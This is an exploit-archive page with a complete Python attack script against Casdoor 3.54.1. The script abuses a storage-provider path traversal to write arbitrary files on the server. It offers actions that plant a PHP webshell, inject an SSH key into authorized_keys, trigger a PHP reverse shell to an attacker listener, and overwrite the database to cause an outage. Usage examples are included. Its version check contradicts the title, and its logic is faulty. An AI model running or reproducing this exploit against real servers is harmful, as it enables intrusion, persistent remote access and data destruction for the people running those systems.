Share
## https://sploitus.com/exploit?id=PACKETSTORM:223580
==================================================================================================================================
    | # Title     : Casdoor 3.54.1 Remote Code Execution via Storage Provider Manipulation                                           |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://casdoor.org/                                                                                             |
    ==================================================================================================================================
    
    [+] Summary    :  This script exploits a path traversal flaw in Casdoor that allows an authenticated attacker to write files anywhere on the server via a misconfigured storage provider.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import base64
    import json
    import os
    import sys
    import time
    import requests
    import urllib3
    from urllib.parse import urljoin
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    class CasdoorExploit:
        def __init__(self, target_url, username, password, app_name="app-built-in", 
                     org_name="built-in", provider_name="path_traversal", verbose=False):
            self.base_url = target_url.rstrip('/')
            self.username = username
            self.password = password
            self.app_name = app_name
            self.org_name = org_name
            self.provider_name = provider_name
            self.verbose = verbose
            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0'
            })
            
        def log(self, msg, level="INFO"):
            colors = {
                "SUCCESS": "\033[92m[+]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "INFO": "\033[96m[*]\033[0m",
                "PROC": "\033[94m[@]\033[0m"
            }
            print(f"{colors.get(level, '[*]')} {msg}")
        
        def get_session(self):
            """Get initial session cookie"""
            self.log("Retrieving session cookie...", "PROC")
            
            try:
                response = self.session.get(f"{self.base_url}/login/built-in")
                
                if 'casdoor_session_id' in self.session.cookies:
                    self.log(f"Session ID: {self.session.cookies['casdoor_session_id']}", "SUCCESS")
                    return True
                else:
                    self.log("Failed to get session cookie", "ERROR")
                    return False
                    
            except Exception as e:
                self.log(f"Session error: {e}", "ERROR")
                return False
        
        def authenticate(self):
            """Authenticate to Casdoor"""
            self.log(f"Authenticating as {self.username}...", "PROC")
            
            login_payload = {
                "application": self.app_name,
                "organization": self.org_name,
                "username": self.username,
                "password": self.password,
                "autoSignin": True,
                "signinMethod": "Password",
                "type": "login"
            }
            
            try:
                response = self.session.post(
                    f"{self.base_url}/api/login",
                    json=login_payload,
                    headers={"Content-Type": "text/plain;charset=UTF-8"}
                )
                
                if response.status_code == 200:
                    data = response.json()
                    if data.get("status") == "ok":
                        self.log("Authentication successful", "SUCCESS")
                        return True
                    else:
                        self.log(f"Authentication failed: {data.get('msg')}", "ERROR")
                        return False
                
                self.log(f"Authentication failed: HTTP {response.status_code}", "ERROR")
                return False
                
            except Exception as e:
                self.log(f"Authentication error: {e}", "ERROR")
                return False
        
        def check_version(self):
            """Check Casdoor version for vulnerability"""
            self.log("Checking Casdoor version...", "PROC")
            
            try:
                response = self.session.get(f"{self.base_url}/api/get-version-info")
                if response.status_code == 200:
                    data = response.json()
                    version = data.get("data", {}).get("version") or data.get("version")
                    
                    if version:
                        self.log(f"Casdoor version: {version}")
                        v_clean = version.lstrip('v').split('-')[0]
                        v_parts = [int(p) for p in v_clean.split('.')]
                        
                        if v_parts[0] >= 3 and v_parts[1] >= 54 and v_parts[2] >= 1:
                            self.log("Version appears PATCHED (>= 3.54.1)", "WARNING")
                            return False
                        else:
                            self.log("Version appears VULNERABLE", "SUCCESS")
                            return True
                else:
                    self.log(f"Could not retrieve version (HTTP {response.status_code})", "WARNING")
                    
            except Exception as e:
                self.log(f"Version check error: {e}", "WARNING")
            
            return True  # Assume vulnerable if can't check
        
        def create_malicious_provider(self):
            """Create storage provider with path traversal prefix"""
            self.log("Creating malicious storage provider...", "PROC")
            
            provider_payload = {
                "owner": "admin",
                "name": self.provider_name,
                "createdTime": time.strftime("%Y-%m-%dT%H:%M:%S+01:00"),
                "displayName": "Path Traversal Provider",
                "category": "Storage",
                "type": "Local File System",
                "method": "Normal",
                "pathPrefix": "../../../../../../../../../"
            }
            
            try:
                response = self.session.post(
                    f"{self.base_url}/api/add-provider",
                    json=provider_payload,
                    headers={"Content-Type": "text/plain;charset=UTF-8"}
                )
                
                if response.status_code == 200:
                    data = response.json()
                    if data.get("status") == "ok":
                        self.log("Malicious provider created successfully", "SUCCESS")
                        return True
                    elif "UNIQUE constraint failed" in data.get("msg", ""):
                        self.log("Provider already exists, reusing", "INFO")
                        return True
                    else:
                        self.log(f"Failed to create provider: {data.get('msg')}", "ERROR")
                        return False
                
                self.log(f"Provider creation failed: HTTP {response.status_code}", "ERROR")
                return False
                
            except Exception as e:
                self.log(f"Provider creation error: {e}", "ERROR")
                return False
        
        def upload_file(self, local_file, remote_path):
            """Upload file to arbitrary remote path"""
            self.log(f"Uploading {local_file} to {remote_path}...", "PROC")
            
            if not os.path.exists(local_file):
                self.log(f"Local file not found: {local_file}", "ERROR")
                return False
            
            params = {
                "owner": self.org_name,
                "user": self.username,
                "application": self.app_name,
                "tag": "custom",
                "parent": "ResourceListPage",
                "fullFilePath": remote_path,
                "provider": self.provider_name
            }
            
            try:
                with open(local_file, 'rb') as f:
                    files = {'file': (os.path.basename(local_file), f, 'application/octet-stream')}
                    response = self.session.post(
                        f"{self.base_url}/api/upload-resource",
                        params=params,
                        files=files
                    )
                
                if response.status_code == 200:
                    data = response.json()
                    if data.get("status") == "ok":
                        self.log(f"File uploaded successfully to {remote_path}", "SUCCESS")
                        return True
                    else:
                        self.log(f"Upload failed: {data.get('msg')}", "ERROR")
                        return False
                
                self.log(f"Upload failed: HTTP {response.status_code}", "ERROR")
                return False
                
            except Exception as e:
                self.log(f"Upload error: {e}", "ERROR")
                return False
        
        def upload_content(self, content, remote_path):
            """Upload string content to arbitrary remote path"""
            temp_file = f"/tmp/{int(time.time())}.tmp"
            
            try:
                with open(temp_file, 'w') as f:
                    f.write(content)
                
                success = self.upload_file(temp_file, remote_path)
                
            finally:
                if os.path.exists(temp_file):
                    os.unlink(temp_file)
            
            return success
        
        def deploy_webshell(self, webshell_path=None):
            """Deploy PHP webshell for persistence"""
            self.log("Deploying PHP webshell...", "PROC")
            
            if not webshell_path:
                webshell_path = "/var/www/html/shell.php"
            
            webshell = '''<?php
    if(isset($_REQUEST["cmd"])){
        echo "<pre>";
        system($_REQUEST["cmd"]);
        echo "</pre>";
    }
    if(isset($_REQUEST["upload"])){
        file_put_contents($_REQUEST["upload"], file_get_contents($_FILES["file"]["tmp_name"]));
        echo "Uploaded: " . $_REQUEST["upload"];
    }
    ?>'''
            
            if self.upload_content(webshell, webshell_path):
                webshell_url = urljoin(self.base_url, webshell_path.replace('/var/www/html', ''))
                self.log(f"Webshell deployed at: {webshell_url}?cmd=id", "SUCCESS")
                return webshell_url
            
            return None
        
        def inject_ssh_key(self, ssh_key_path=None, ssh_authorized_path=None):
            """Inject SSH public key for persistence"""
            self.log("Injecting SSH key...", "PROC")
            
            if ssh_key_path and os.path.exists(ssh_key_path):
                with open(ssh_key_path, 'r') as f:
                    ssh_key = f.read()
            else:
                ssh_key = input("Enter SSH public key content: ")
            
            if not ssh_authorized_path:
                ssh_authorized_path = "/home/casdoor/.ssh/authorized_keys"
            
            if self.upload_content(ssh_key, ssh_authorized_path):
                self.log(f"SSH key injected to {ssh_authorized_path}", "SUCCESS")
                self.log("You can now SSH as casdoor user", "INFO")
                return True
            
            return False
        
        def execute_command(self, cmd, webshell_url=None):
            """Execute system command via webshell"""
            if not webshell_url:
                self.log("No webshell URL provided", "ERROR")
                return None
            
            try:
                response = self.session.get(webshell_url, params={'cmd': cmd}, timeout=30)
                
                if response.status_code == 200:
                    output = response.text
                    output = output.replace('<pre>', '').replace('</pre>', '')
                    return output.strip()
                
            except Exception as e:
                self.log(f"Command execution error: {e}", "ERROR")
            
            return None
        
        def reverse_shell(self, lhost, lport, webshell_url=None):
            """Deploy reverse shell payload"""
            self.log(f"Deploying reverse shell to {lhost}:{lport}...", "PROC")
            
            rev_shell = f'''<?php
    $sock = fsockopen("{lhost}", {lport});
    if ($sock) {{
        exec("/bin/sh -i <&3 >&3 2>&3");
        fclose($sock);
    }}
    ?>'''
            rev_shell_path = "/tmp/revshell.php"
            
            if self.upload_content(rev_shell, rev_shell_path):
                self.log("Reverse shell uploaded, triggering...", "PROC")
    
                trigger_url = urljoin(self.base_url, rev_shell_path.replace('/var/www/html', ''))
                
                try:
                    self.session.get(trigger_url, timeout=1)
                    self.log("Reverse shell payload sent. Check your listener!", "SUCCESS")
                    return True
                except:
                    pass
            
            return False
        
        def corrupt_database(self, db_path=None):
            """Corrupt Casdoor database for DoS"""
            self.log("Attempting database corruption...", "PROC")
            
            if not db_path:
                db_path = "/app/casdoor.db"
            
            corrupt_content = f"CORRUPTED BY CVE-2026-6815 EXPLOIT - {time.time()}"
            
            if self.upload_content(corrupt_content, db_path):
                self.log(f"Database corrupted at {db_path}", "SUCCESS")
                self.log("Casdoor service may be compromised", "WARNING")
                return True
            
            return False
        
        def run(self, local_file=None, remote_path=None, action="webshell", 
                lhost=None, lport=None, ssh_key=None, webshell_path=None):
            """Main exploit routine"""
            
            self.log(f"Target: {self.base_url}")
    
            if not self.get_session():
                self.log("Failed to get session", "ERROR")
                return False
    
            if not self.authenticate():
                self.log("Authentication failed", "ERROR")
                return False
            if not self.check_version():
                self.log("Target appears patched", "WARNING")
            if not self.create_malicious_provider():
                self.log("Failed to create provider", "ERROR")
                return False
            if action == "upload" and local_file and remote_path:
                return self.upload_file(local_file, remote_path)
            
            elif action == "webshell":
                webshell_url = self.deploy_webshell(webshell_path)
                if webshell_url and lhost and lport:
                    self.reverse_shell(lhost, lport, webshell_url)
                return bool(webshell_url)
            
            elif action == "ssh":
                return self.inject_ssh_key(ssh_key)
            
            elif action == "dos":
                return self.corrupt_database()
            
            elif action == "command" and webshell_path:
                webshell_url = urljoin(self.base_url, webshell_path.replace('/var/www/html', ''))
                cmd = input("Enter command to execute: ")
                output = self.execute_command(cmd, webshell_url)
                if output:
                    print("\n" + "=" * 60)
                    print(output)
                    print("=" * 60)
                return bool(output)
            
            else:
                self.log("No valid action specified", "ERROR")
                return False
    def main():
        parser = argparse.ArgumentParser(
            description="CVE-2026-6815 - Casdoor Path Traversal Arbitrary File Write",
            epilog="""
    Examples:
      python3 exploit.py -t http://target:8000 -u admin -p 123 --action webshell
      python3 exploit.py -t http://target:8000 -u admin -p 123 --action webshell --lhost 10.0.0.5 --lport 4444
      python3 exploit.py -t http://target:8000 -u admin -p 123 --action ssh --ssh-key ~/.ssh/id_rsa.pub
      python3 exploit.py -t http://target:8000 -u admin -p 123 --action upload --local shell.php --remote /var/www/html/shell.php
      python3 exploit.py -t http://target:8000 -u admin -p 123 --action dos
            """
        )
        
        parser.add_argument("-t", "--target", required=True, help="Target Casdoor URL")
        parser.add_argument("-u", "--username", default="admin", help="Username (default: admin)")
        parser.add_argument("-p", "--password", default="123", help="Password (default: 123)")
        parser.add_argument("--app", default="app-built-in", help="Application name")
        parser.add_argument("--org", default="built-in", help="Organization name")
        
        parser.add_argument("--action", choices=["webshell", "ssh", "upload", "dos", "command"],
                            default="webshell", help="Action to perform")
        parser.add_argument("--local", help="Local file path for upload")
        parser.add_argument("--remote", help="Remote file path for upload")
        parser.add_argument("--webshell-path", help="Custom webshell path")
        parser.add_argument("--ssh-key", help="SSH public key file")
        
        parser.add_argument("--lhost", help="Listener host for reverse shell")
        parser.add_argument("--lport", type=int, help="Listener port for reverse shell")
        
        parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
        
        args = parser.parse_args()
        
        print("""
    โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
    โ•‘  CVE-2026-6815 - Casdoor Path Traversal Arbitrary File Write    โ•‘
    โ•‘  Remote Code Execution via Storage Provider Manipulation        โ•‘
    โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
        """)
        
        exploit = CasdoorExploit(
            target_url=args.target,
            username=args.username,
            password=args.password,
            app_name=args.app,
            org_name=args.org,
            verbose=args.verbose
        )
        success = exploit.run(
            local_file=args.local,
            remote_path=args.remote,
            action=args.action,
            lhost=args.lhost,
            lport=args.lport,
            ssh_key=args.ssh_key,
            webshell_path=args.webshell_path
        )
        sys.exit(0 if success else 1)
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================